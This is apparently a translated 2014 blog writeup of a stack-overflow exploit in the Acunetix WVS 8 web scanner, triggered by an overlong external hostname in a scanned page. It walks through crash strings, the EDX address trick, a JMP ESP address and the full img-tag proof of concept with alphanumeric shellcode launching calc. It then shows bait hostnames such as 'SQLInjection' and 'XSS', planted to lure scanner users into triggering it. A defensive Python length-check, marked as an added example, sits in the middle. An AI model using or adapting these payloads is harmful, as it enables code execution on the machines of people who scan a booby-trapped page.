Livers, 2014/04/26 13:06

From: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html

0x00 Overview

A few weeks ago the author published an article about a WinRAR 0day (file name spoofing). It drew a lot of attention and inquiries, so this time he released a 0day in WVS, the most popular web vulnerability scanner: Acunetix 8 (build 20120704). The author's intent is to make attackers think twice before pressing the scan button in WVS (real active defense).

0x01 Vulnerability Analysis

Acunetix is a powerful vulnerability scanner that many novices like to use for scanning.

During the scan initialization phase there is an additional option, as shown below.

This caught the author's interest. Analysis shows that, while parsing HTTP responses, WVS extracts external resource references such as:

<img src=http://externalSource.com/someimg.png >
<a href=http://externalSource.com/ ></a>
etc.

Analyzing this process further, the author found, to his surprise, that WVS crashes when an external domain name exceeds 268 bytes. He then tried to construct a domain name of 268 bytes or more; the first test was as follows:

<a href="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
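From the defender's side, the root cause is a resource extractor that copies a hostname into a fixed-size buffer without a length check. As an added example, not code from the original post or from Acunetix, the following parser extracts external references the way a crawler would and flags any host of 268 bytes or more (the overflow point reported above); the set of tag/attribute pairs beyond img/src and a/href is an assumption.

```python
from html.parser import HTMLParser

HOST_LIMIT = 268  # overflow point reported in the post (host bytes, scheme excluded)
WANTED = {"img": "src", "a": "href", "script": "src", "link": "href"}  # assumed set


class ResourceExtractor(HTMLParser):
    """Collect (tag, url) pairs for external resource references, crawler-style."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attr = WANTED.get(tag)
        for name, value in attrs:
            if attr and name == attr and value:
                self.refs.append((tag, value))


def host_of(url):
    """Authority of an absolute http(s) URL, or None. Done by hand because
    urllib's urlsplit rejects a lone ']' in the host, as in the post's payload."""
    lower = url.lower()
    for scheme in ("http://", "https://"):
        if lower.startswith(scheme):
            rest = url[len(scheme):]
            cut = [i for i in (rest.find(c) for c in "/?#") if i != -1]
            return rest[: min(cut)] if cut else rest
    return None


def overlong_hosts(html, limit=HOST_LIMIT):
    """Return (tag, host_length) for every reference whose host is >= limit bytes."""
    parser = ResourceExtractor()
    parser.feed(html)
    hits = []
    for tag, url in parser.refs:
        host = host_of(url)
        if host is not None and len(host.encode("utf-8")) >= limit:
            hits.append((tag, len(host.encode("utf-8"))))
    return hits


# Constructed sample: a benign reference, one host just under the limit,
# and one at 300 bytes that a fixed-size buffer would overflow.
SAMPLE_HTML = (
    '<html><img src="http://externalSource.com/someimg.png">'
    '<a href="http://' + "A" * 267 + '/">x</a>'
    '<img src="http://' + "A" * 300 + '/x.png"></html>'
)
```

A scanner that applies this check before copying the host (or that simply bounds the copy) refuses the overlong reference instead of overflowing its stack buffer.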

Attach Immunity Debugger to WVS and scan the site: EDX is overwritten with 0x41 ('A') and the memory access crashes:

The author first intended to use the SEH overwrite to execute shellcode, but that turned out to be cumbersome.

Here is the catch: because the payload is a URL string, the characters that WVS URL-encodes must be avoided:

0x22 ("), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/)

So the shellcode must not only be pure ASCII but also avoid these URL-encoded characters, which makes getting around the SEH protection very hard.

The author's idea is instead to use the already controllable EDX to construct a readable address, keeping in mind that the faulting instruction reads 8 bytes below the constructed EDX:

MOV ECX, DWORD PTR DS:[EDX-8]

EDX must satisfy two conditions:

1. [EDX] is readable
2. it consists of ASCII characters that are not URL-escaped

Finally, an address of the form 0x663030XX is used; in little-endian ASCII this is "X00f", which is the "500f" that appears in the payloads below.

The earlier test established that the URL overflows at 268 bytes (excluding http://); here the overflow point is at offset 269 (where 500f starts).

<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB">

Scan with WVS:

After the RET, EIP is overwritten with BBBB (0x42424242).

Next the shellcode location has to be chosen. EAX is the argument to the called function and holds only the 268 bytes of A, so ESP is the obvious choice (it is large enough for ASCII-encoded shellcode). With EIP controlled, storage space for the shellcode is found.

In addition, a JMP ESP is needed. Using a public, generic address requires one that is pure ASCII and not URL-encoded; the author used 0x7e79515D in the system's SxS.dll, which is ]Qy~ in ASCII. Put together, the whole POC is:

<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB ">

Finally, Metasploit's alphanumeric shellcode encoder generates pure-ASCII, non-URL-encoded shellcode that launches calc.exe (other shellcodes can be generated with MSF as well). Using the [edx] address, and since WVS was not built with the DEP compile option enabled, DEP protection is bypassed.

<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBB]Qy~…

0x02 Exploitation

The author has some fun here, because this bug is only triggered if the WVS user selects the option below.

So the author mischievously constructs some very tempting external domain names:

"SQLInjection", "XSS", "CSRF", and so on:

<html>
<img src="http://SQLInjection................................................................................................ . AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBB]Qy~…" >
<img src="http://XSS......................................................................................................... ..." >
<img src="http://CSRF........................................................................................................ ..." >
<img src="http://DeepScan.................................................................................................... ..." >
<img src="http://NetworkScan................................................................................................. ..." >
<img src="http://DenialOfService............................................................................................. ..." >
</html>

As shown in the figure below:

0x03 Summary

I tested WVS 8.0 build 20120704 and it popped calc successfully.

Some people say the WVS 8.0 updates also have this problem; I tested the following versions:

WVS 8.0 build 20130416, and various versions of WVS 9.

They do not have this problem.

The author provides the exploit for download.